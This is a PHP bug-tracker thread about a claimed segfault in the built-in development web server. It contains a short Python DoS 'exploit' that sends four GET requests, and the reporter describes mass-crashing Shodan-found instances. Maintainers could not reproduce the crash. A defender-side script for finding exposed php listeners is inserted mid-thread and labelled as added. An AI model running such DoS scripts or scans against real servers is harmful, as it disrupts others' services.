Bug #78047 [DoS] Segmentation fault through HTTP Requests
Submitted: 2019-05-21 11:45 UTC Modified: 2021-08-08 04:22 UTC
Votes: 10
Avg. Score: 4.3 ± 1.2
Reproduced: 0 of 0 (0.0%)
From: michele dot cisternino at protonmail dot com Assigned: cmb (profile)
Status: No Feedback Package: Built-in web server
PHP Version: 7.3Git-2019-05-21 (snap) OS: Linux
Private report: No CVE-ID: None
 [2019-05-21 11:45 UTC] michele dot cisternino at protonmail dot com
Description:
------------
Hi,

I found a vulnerability while I was testing the PHP built-in web server.
The vulnerability could be exploited by an attacker to crash the server causing a segmentation fault.

I think the vulnerability resides in the way the server handles HTTP requests.

The steps to reproduce the segmentation fault are the following:

$ apt install php
$ mkdir server
$ cd server
$ touch file.php
$ php -S 0.0.0.0:80
$ python exploit.py 127.0.0.1 #But could be a remote server as well

You can find the exploit in the "Test script" section.

Further investigation of the issue could lead an attacker to exploit the memory corruption in the server to get a reverse shell (e.g. buffer overflow).
Anyway, with the actual exploit an attacker could already DoS the server.

Test script:
---------------
import sys
import requests

if len(sys.argv) < 2:
    print("[!] Usage: %s TARGET" % sys.argv[0])
    sys.exit()

target = sys.argv[1].strip()

# Normalise the target into a base URL ending in "/".
if not target.startswith("http://") and not target.startswith("https://"):
    target = "http://" + target

if not target.endswith("/"):
    target = target + "/"

# Request order: base URL, existing file, non-existent file, base URL again.
filenames = ["", "file.php", "test.php", ""]

print("[*] Sending requests to %s." % target)
try:
    for filename in filenames:
        requests.get(target + filename)
    print("The exploit didn't work.")
except requests.exceptions.ConnectionError:
    # The server stopped answering, i.e. it crashed.
    print("The exploit worked!")

Expected result:
----------------
The server crashes with a "Segmentation fault" error.


History
 [2019-05-21 15:18 UTC] michele dot cisternino at protonmail dot com
The exploit consists of sending HTTP requests in the following order:

1 - Request the base URL
2 - Request a valid file on the server
3 - Request a non-existent file on the server
4 - Request the base URL
 [2019-05-21 17:46 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2019-05-21 17:46 UTC] cmb@php.net
> The vulnerability could be exploited by an attacker […]

No, it can not, because the built-in webserver is for
*development* purposes only.
 [2019-05-21 18:35 UTC] michele dot cisternino at protonmail dot com
Sorry for the late reply.

Yes, the server is usually used for testing purposes, but it can be exposed to the internet as well.
You can launch a simple query on Shodan to find multiple instances of the built-in PHP server exposed.

An attacker could write a script that launches a request to the Shodan API, gets a list of vulnerable instances and DoSes them all iteratively.

Moreover, in my daily pentest job, I found this kind of server not exposed to the internet, but used internally by companies.
An attacker, thanks to the exploit I wrote, could cause a continuous DoS.

Moreover, as I already said, the vulnerability could be further investigated to upgrade it to an RCE.

I hope you understand the criticality of the vulnerability.
 [2019-05-22 07:40 UTC] cmb@php.net
To clarify: the built-in web server *can* of course be connected
to a public network; it is, however, not supposed to[1].  Therefore
we do not consider any issues related to the built-in web server
to be security issues.

[1] <https://www.php.net/manual/en/features.commandline.webserver.php>
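As an added defender-side check, not part of the bug report or of PHP itself, the script below parses `ss -ltnp` output and flags `php` listeners bound to a non-loopback address, which is the exposure the reply above says the built-in server is not meant for. The sample output is constructed; the process name "php" is assumed to be the CLI built-in server (confirm with `ps -p PID -o args=`).

```python
import ipaddress
import re
import subprocess

# Constructed sample of `ss -ltnp` output (not captured from a real host).
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:80          0.0.0.0:*         users:(("php",pid=1234,fd=4))
LISTEN 0      128    127.0.0.1:8080      0.0.0.0:*         users:(("php",pid=1235,fd=4))
LISTEN 0      128    [::]:8000           [::]:*            users:(("php",pid=1236,fd=4))
LISTEN 0      128    [::1]:8001          [::]:*            users:(("php",pid=1237,fd=4))
LISTEN 0      511    0.0.0.0:443         0.0.0.0:*         users:(("nginx",pid=42,fd=6))
"""

# Matches the first process entry in ss's "Process" column.
PROC_RE = re.compile(r'\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


def split_local(field):
    """Split ss's Local Address:Port column into (host, port); strips IPv6 brackets."""
    host, _, port = field.rpartition(":")
    return host.strip("[]"), int(port)


def is_externally_reachable(host):
    """True when the bind address accepts connections from other hosts."""
    if host in ("*", ""):          # older ss prints '*' for the unspecified address
        return True
    addr = ipaddress.ip_address(host.split("%")[0])   # drop IPv6 scope id
    return addr.is_unspecified or not addr.is_loopback


def exposed_php_dev_servers(ss_output):
    """Return (host, port, pid) for php listeners bound beyond loopback."""
    findings = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 6 or cols[0] != "LISTEN":   # skips header and non-listeners
            continue
        host, port = split_local(cols[3])
        m = PROC_RE.search(cols[5])
        if m and m.group("name") == "php" and is_externally_reachable(host):
            findings.append((host, port, int(m.group("pid"))))
    return findings


if __name__ == "__main__":
    # Run against the live host; fall back to the constructed sample if ss is missing.
    try:
        out = subprocess.run(["ss", "-ltnp"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        out = SAMPLE_SS_OUTPUT
    for host, port, pid in exposed_php_dev_servers(out):
        print("php listener reachable from other hosts: %s:%d (pid %d)" % (host, port, pid))
```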
 [2019-05-22 07:57 UTC] michele dot cisternino at protonmail dot com
I disagree, respectfully.
A malicious user, thanks to this exploit, can crash all the public instances of the built-in server (around 2,000, in my search).

Anyway, if you don't agree, I can disclose it (you also switched the status from Private to Public), so we can see what the hacking community thinks about it.

Have a nice day :)
 [2019-05-22 08:12 UTC] spam2 at rhsoft dot net
> can crash all the public instances of the built-in server

hopefully and then the people maybe read the first red box at https://www.php.net/manual/en/features.commandline.webserver.php
 [2019-05-23 09:25 UTC] nikic@php.net
I can't reproduce this on a 7.3 nts build. Also no warnings when running under valgrind.
 [2019-05-23 13:30 UTC] michele dot cisternino at protonmail dot com
It doesn't matter anymore :')
It's just a bug, rofl.
 [2021-07-30 11:42 UTC] cmb@php.net
-Status: Open +Status: Feedback -Assigned To: +Assigned To: cmb
 [2021-07-30 11:42 UTC] cmb@php.net
> It's just a bug, rofl.

If nobody can reproduce a reported bug, there may be no bug. ;)
 [2021-08-08 04:22 UTC] php-bugs at lists dot php dot net
No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Re-Opened". Thank you.